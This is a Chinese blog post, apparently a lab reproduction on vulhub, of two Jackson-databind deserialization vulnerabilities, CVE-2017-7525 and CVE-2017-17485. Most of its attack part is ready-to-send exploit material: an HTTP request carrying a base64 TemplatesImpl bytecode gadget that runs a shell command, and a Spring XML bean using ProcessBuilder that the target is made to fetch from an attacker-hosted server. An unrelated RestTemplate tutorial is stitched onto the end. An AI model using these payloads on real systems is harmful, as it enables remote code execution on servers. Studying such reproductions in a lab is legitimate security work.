Jackson-databind 反序列化漏洞(CVE-2017-7525&CVE-2017-17485)

漏洞详细

具体详细请移步:https://vulhub.org/#/environments/jackson/CVE-2017-7525/
因为本人实在不懂这方面,只能先复现,然后慢慢磨了。

漏洞复现

CVE-2017-7525
发送以下数据包,即可执行touch /tmp/prove1.txt命令

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}

这个POC只能运行在目标为JDK7u21以下的环境中,其他情况请更换Gadget

(所谓Gadget应该指的是数据包中com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl这一串)

在这里插入图片描述
CVE-2017-17485
这个漏洞据说是CVE-2017-7525的黑名单绕过
先将以下内容保存为spel.xml,放到服务器上公开

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>touch</value>
                <value>/tmp/prove2.txt</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>

我这里直接用python开了个简单的http
在这里插入图片描述
然后,发送以下数据包,使Jackson加载bean,触发漏洞

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 138

{
  "param": [
    "org.springframework.context.support.FileSystemXmlApplicationContext",
    "http://192.168.30.128:8000/spel.xml"
  ]
}

在这里插入图片描述

`RestTemplate` 是Spring框架提供的用于发送HTTP请求的同步客户端。它提供了多种便捷的方法来执行常见类型的HTTP请求,并且可以很容易地与Spring的声明式REST客户端(如`@RestClient`接口)集成。 要使用`RestTemplate`发送POST请求,你需要创建一个`RestTemplate`实例,然后使用`postForEntity`、`postForObject`或`exchange`等方法之一来发送请求。下面是使用`RestTemplate`发送POST请求的基本步骤: 1. 首先,你需要在项目中引入Spring Web依赖,这样才能使用`RestTemplate`。 2. 创建`RestTemplate`实例,这通常通过Spring的依赖注入来完成。 3. 准备HTTP请求体,通常是将要发送的数据封装在一个POJO对象中。 4. 调用`RestTemplate`的方法发送POST请求,并接收响应。 以下是一个简单的例子,展示了如何使用`RestTemplate`发送POST请求: ```java import org.springframework.web.client.RestTemplate; import org.springframework.http.HttpEntity; import org.springframework.http.ResponseEntity; import org.springframework.http.MediaType; import org.springframework.http.HttpHeaders; // 创建RestTemplate实例 RestTemplate restTemplate = new RestTemplate(); // 设置请求头,指定内容类型为application/json HttpHeaders headers = new HttpHeaders(); headers.setContentType(MediaType.APPLICATION_JSON); // 封装POST请求体 String jsonInputString = "{\"key1\":\"value1\", \"key2\":\"value2\"}"; HttpEntity<String> request = new HttpEntity<>(jsonInputString, headers); // 发送POST请求 ResponseEntity<String> response = restTemplate.postForEntity("http://example.com/api/resource", request, String.class); // 获取响应内容 String result = response.getBody(); ``` 上面的代码中,我们首先创建了一个`RestTemplate`实例。然后,我们设置了请求头,以指示我们希望发送JSON格式的数据。之后,我们创建了一个包含请求数据的`HttpEntity`对象。最后,我们调用`postForEntity`方法发送POST请求,并通过泛型参数`String.class`指定了期望响应体的类型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值